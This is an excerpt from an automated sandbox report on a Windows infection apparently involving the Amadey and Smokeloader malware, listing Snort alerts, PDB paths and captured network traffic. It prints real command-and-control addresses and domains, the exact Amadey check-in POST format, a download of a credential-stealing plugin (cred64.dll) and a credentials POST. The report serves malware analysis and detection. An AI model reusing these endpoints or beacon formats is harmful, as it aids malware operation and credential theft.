                              Source: unknownHTTPS traffic detected: 23.35.236.109:443 -> 192.168.2.3:49697 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 185.98.131.207:443 -> 192.168.2.3:49723 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 20.190.159.19:443 -> 192.168.2.3:49728 version: TLS 1.2
                              Source: Binary string: /C:\ziperokelodofu\gukeheyamufuji\cutovalajoz_cowadulolidako3.pdb source: kmxId0uLRn.exe, thgcici.1.dr
                              Source: Binary string: D:\Mktmp\Amadey\Release\Amadey.pdb source: 9545.exe, 0000000E.00000000.403314322.0000000000E00000.00000002.00000001.01000000.0000000A.sdmp, 9545.exe, 0000000E.00000002.419055103.0000000000E00000.00000002.00000001.01000000.0000000A.sdmp, 9545.exe, 0000000E.00000003.404330166.00000000013F3000.00000004.00000020.00020000.00000000.sdmp, gntuud.exe, 00000015.00000000.418195979.0000000000F30000.00000002.00000001.01000000.0000000D.sdmp, gntuud.exe, 00000015.00000002.789042996.0000000000F30000.00000002.00000001.01000000.0000000D.sdmp, gntuud.exe, 0000001D.00000000.425079213.0000000000F30000.00000002.00000001.01000000.0000000D.sdmp, gntuud.exe, 0000001D.00000002.430617953.0000000000F30000.00000002.00000001.01000000.0000000D.sdmp, gntuud.exe, 0000002C.00000000.542142836.0000000000F30000.00000002.00000001.01000000.0000000D.sdmp, gntuud.exe, 0000002C.00000002.547939259.0000000000F30000.00000002.00000001.01000000.0000000D.sdmp, gntuud.exe.14.dr, 9545.exe.1.dr
                              Source: Binary string: C:\ziperokelodofu\gukeheyamufuji\cutovalajoz_cowadulolidako3.pdb source: kmxId0uLRn.exe, thgcici.1.dr
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeCode function: 12_2_00C2A284 FindFirstFileExW,12_2_00C2A284
                              Source: C:\Users\user\AppData\Local\Temp\9545.exeCode function: 14_2_00DF1396 FindFirstFileExW,14_2_00DF1396

                              Networking

                              barindex
                              Source: C:\Windows\explorer.exeNetwork Connect: 31.41.244.228 80Jump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 62.204.41.79 80
                              Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 192.168.2.3 80
                              Source: C:\Windows\explorer.exeDomain query: r3oidsofsios.com
                              Source: C:\Windows\explorer.exeDomain query: kikangalaassociates.com
                              Source: TrafficSnort IDS: 2851815 ETPRO TROJAN Sharik/Smokeloader CnC Beacon 18 192.168.2.3:49699 -> 185.246.221.151:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49735 -> 62.204.41.79:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49738 -> 62.204.41.79:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49739 -> 62.204.41.79:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49740 -> 62.204.41.79:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49741 -> 62.204.41.79:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49742 -> 62.204.41.79:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49743 -> 62.204.41.79:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49744 -> 62.204.41.79:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49745 -> 62.204.41.79:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49746 -> 62.204.41.79:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49747 -> 62.204.41.79:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49748 -> 62.204.41.79:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49749 -> 62.204.41.79:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49750 -> 62.204.41.79:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49751 -> 62.204.41.79:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49752 -> 62.204.41.79:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49753 -> 62.204.41.79:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49754 -> 62.204.41.79:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49756 -> 62.204.41.79:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49757 -> 62.204.41.79:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49759 -> 62.204.41.79:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49760 -> 62.204.41.79:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49761 -> 62.204.41.79:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49762 -> 62.204.41.79:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49764 -> 62.204.41.79:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49765 -> 62.204.41.79:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49766 -> 62.204.41.79:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49767 -> 62.204.41.79:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49768 -> 62.204.41.79:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49769 -> 62.204.41.79:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49770 -> 62.204.41.79:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49771 -> 62.204.41.79:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49772 -> 62.204.41.79:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49774 -> 62.204.41.79:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49775 -> 62.204.41.79:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49776 -> 62.204.41.79:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49777 -> 62.204.41.79:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49778 -> 62.204.41.79:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49779 -> 62.204.41.79:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49780 -> 62.204.41.79:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49781 -> 62.204.41.79:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49782 -> 62.204.41.79:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49783 -> 62.204.41.79:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49784 -> 62.204.41.79:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49785 -> 62.204.41.79:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49786 -> 62.204.41.79:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49787 -> 62.204.41.79:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49788 -> 62.204.41.79:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49789 -> 62.204.41.79:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49790 -> 62.204.41.79:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49791 -> 62.204.41.79:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49792 -> 62.204.41.79:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49793 -> 62.204.41.79:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49794 -> 62.204.41.79:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49795 -> 62.204.41.79:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49796 -> 62.204.41.79:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49797 -> 62.204.41.79:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49798 -> 62.204.41.79:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49799 -> 62.204.41.79:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49800 -> 62.204.41.79:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49801 -> 62.204.41.79:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49802 -> 62.204.41.79:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49803 -> 62.204.41.79:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49804 -> 62.204.41.79:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49805 -> 62.204.41.79:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49806 -> 62.204.41.79:80
                              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.3:49807 -> 62.204.41.79:80
                              Source: Malware configuration extractorURLs: 62.204.41.79/fb73jc3/index.php
                              Source: Malware configuration extractorURLs: http://s2scomm20.com/
                              Source: Malware configuration extractorURLs: http://c2csosi228d.com/
                              Source: Malware configuration extractorURLs: http://xdd42sdfsdf.com/
                              Source: Malware configuration extractorURLs: https://t.me/ttruelive
                              Source: Malware configuration extractorURLs: https://steamcommunity.com/profiles/76561199443972360
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODEyODY=Host: 62.204.41.79Content-Length: 81438Cache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: GET /fb73jc3/Plugins/cred64.dll HTTP/1.1Host: 62.204.41.79
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Host: 62.204.41.79Content-Length: 21Content-Type: application/x-www-form-urlencodedData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 63 72 65 64 3d Data Ascii: id=853321935212&cred=
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
                              Source: global trafficHTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
